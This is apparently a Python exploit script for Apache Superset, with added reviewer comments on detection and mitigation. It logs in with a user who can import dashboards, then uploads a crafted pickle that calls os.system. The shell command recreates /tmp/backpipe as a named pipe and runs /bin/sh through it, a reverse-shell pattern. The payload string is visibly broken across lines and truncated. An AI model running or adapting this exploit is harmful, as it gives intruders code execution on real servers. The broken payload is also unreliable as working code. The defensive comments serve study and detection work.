'''_____________________________________________________________________ |[] SHELL |ROOT]|!"| |"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"| |CODED BY > R3DXPLOIT(JIMMY) | | |EMAIL > RETURN_ROOT@PROTONMAIL.COM | | |Original PoC by David May (david.may@semanticbits.com) | | |_____________________________________________________________________|/| '''
# Reviewer summary (defender view).
# This is a proof-of-concept against the Superset dashboard-import endpoint.
# It logs in with an account that holds the "can Import Dashboards" permission
# and uploads a hand-written pickle file to /superset/import_dashboards.
# The PoC relies on the server unpickling that upload; unpickling
# attacker-supplied bytes is equivalent to running attacker-chosen code.
#
# What to look for in logs, all taken from the requests this script sends:
#   * a multipart POST to /superset/import_dashboards carrying a
#     'file' part of type application/octet-stream with a '.pickle' name
#   * the fixed Firefox/58.0 User-Agent with 'DNT: 1' and 'Connection: close'
#   * on the server host, the web-application process spawning rm, mknod
#     or /bin/sh, and a /tmp/backpipe node appearing
#
# Mitigation direction: the import path should not deserialize uploads with
# pickle, and the import permission should be granted only to fully trusted
# administrators. Presumably fixed upstream -- confirm against the vendor
# advisory for the deployed release.
import sys
import os
from lxml import html
import requests
import argparse

# Fixed request headers. main() assigns its own headers_dict with the same
# contents, so this module-level copy is never read by main().
headers_dict = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
    'DNT': '1',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1',
}


def main() :
    """Parse the CLI options, write the pickle file, log in and upload it.

    All six options are required. Nothing is returned; the success path
    ends in sys.exit() and failures are reported with print().
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--tcp', help='tcp ip for shell', dest='tcp' , required = True )
    parser.add_argument('-tp', '--tport', help='tcp port for shell', dest='tport', required = True)
    parser.add_argument('-i', '--ip', help='ip', dest='ip', required = True)
    parser.add_argument('-p', '--port', help='port', dest='port', required = True)
    parser.add_argument('-U', '--user', help='User must belong to user with can Import Dashboards on Superset privilege', dest='user', required = True)
    parser.add_argument('-P', '--passw', help='pass must belong to user with can Import Dashboards on Superset privilege', dest='passw', required = True)
    args = parser.parse_args()
    # Script arguments
    args.port = args.port  # self-assignment; has no effect
    # Verify these URLs match your environment
    # As written, both URLs are plain http and are built from args.tcp and
    # args.tport. args.ip and args.port are used below only to name the
    # local pickle file.
    login_URL = 'http://' + args.tcp + ':' + args.tport + '/login/'
    upload_URL = 'http://' + args.tcp + ':' + args.tport + '/superset/import_dashboards'
    # Remove any pickle file left over from an earlier run with the same name.
    if os.path.isfile(str(args.ip)+'_'+str(args.port)+'.pickle'):
        os.remove(str(args.ip)+'_'+str(args.port)+'.pickle')
    # This assignment makes headers_dict a local name inside main().
    headers_dict = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
        'DNT': '1',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
    }
    evilPickle = open(str(args.ip)+'_'+str(args.port)+'.pickle','w+')
    # The text written here is a protocol-0 pickle stream: 'cos\nsystem\n'
    # names os.system, and the trailing 'tR.' makes the unpickler call it with
    # the quoted shell string. No class from the target application is
    # involved, which is why any pickle.load on uploaded data is unsafe.
    # NOTE(review): in this copy the literal is split across a physical line
    # and is not valid Python as shown; the text looks truncated by page
    # extraction. It is reproduced unchanged.
    evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe 
p;/bin/sh 0/tmp/backpipe\'\ntR.')
    evilPickle.close()
    try :
        # One session is used throughout, so cookies set at login are sent
        # with the later upload requests.
        session = requests.session()
        login_page = session.get(login_URL)
        # A non-200 status is only reported; execution continues regardless.
        if login_page.status_code != 200:
            print('Login page not reached')
        login_tree = html.fromstring(login_page.content)
        # xpath() returns a list of matching attribute values, not one string.
        token = login_tree.xpath('//input[@id="csrf_token"]/@value')
        login_data = {
            'token' : token,
            'username' : args.user,
            'password' : args.passw,
        }
        headers_dict['Referer'] = login_URL
        # The login response is stored but never inspected.
        login = session.post(login_URL, headers=headers_dict, data=login_data)
        upload_page = session.get(upload_URL)
        if upload_page.status_code != 200:
            print('Upload page not reached')
        upload_tree = html.fromstring(upload_page.content)
        token = upload_tree.xpath('//input[@id="csrf_token"]/@value')
        headers_dict['Referer'] = upload_URL
        # Multipart upload of the pickle file as form field 'file'. This is
        # the request a detection rule for the import endpoint should match.
        # The file handle opened inline is never closed explicitly.
        upload = session.post(upload_URL, headers=headers_dict, data={'token':token}, files={'file':(str(args.ip)+'_'+str(args.port)+'.pickle',open(str(args.ip)+'_'+str(args.port)+'.pickle','rb'),'application/octet-stream')})
        session.close()
        # SystemExit is not a subclass of Exception, so the handlers below
        # do not intercept this exit.
        sys.exit()
    except requests.exceptions.ConnectionError :
        print('Connection Refused, Check The IP and PORT!!!')
    except Exception as e:
        print('Error :\n\n' , e)


if __name__ == "__main__" :
    main()